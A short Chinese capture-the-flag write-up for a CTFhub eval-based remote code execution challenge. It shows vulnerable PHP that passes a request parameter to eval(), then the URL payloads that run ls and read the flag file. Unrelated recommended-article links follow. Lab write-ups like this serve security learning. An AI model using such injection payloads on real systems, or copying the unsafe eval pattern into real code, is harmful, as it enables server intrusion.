CTFhub-RCE-evel执行

访问目标地址:

<?php

if (isset($_REQUEST['cmd'])) {

eval($_REQUEST["cmd"]);

} else {

highlight_file(FILE);

}

?>

根据PHP代码显示,要求将命令赋值给cmd然后执行

先查看一下根目录文件 /?cmd=system("ls");
!切记最后的分号不可省略!

没有需要的文件

看看上一级的文件夹 /?cmd=system("ls /");
!切记最后的分号不可省略!

打开flag文件发现FLAG /?cmd=system("cat /flag_8668");
!切记最后的分号不可省略!

相关推荐
星辰烈龙几秒前
黑马程序员Java基础9
java·开发语言
山沐与山2 分钟前
【Redis】Redis集群模式架构详解
java·redis·架构
GISer_Jing11 分钟前
今天看了京东零售JDS的保温直播,秋招,好像真的结束了,接下来就是论文+工作了!!!加油干论文,学&分享技术
前端·零售
ss27312 分钟前
Java并发编程:DelayQueue延迟订单系统
java·python·算法
wcy_101117 分钟前
七大软件设计原则
java·设计规范
Mapmost18 分钟前
【高斯泼溅】如何将“歪头”的3DGS模型精准“钉”在地图上,杜绝后续误差?
前端
invicinble18 分钟前
jar包在执行的时候需要关注的细节(提供一个解构jvm问题的视角)
java·jvm·jar
麦芽糖021920 分钟前
SSE介绍及使用(Server-Send Events)
java
alan072124 分钟前
【Java + Elasticsearch全量 & 增量同步实战】
java·elasticsearch·jenkins
hashiqimiya37 分钟前
后端springboot的接收前端发来的数据反序列化原理
java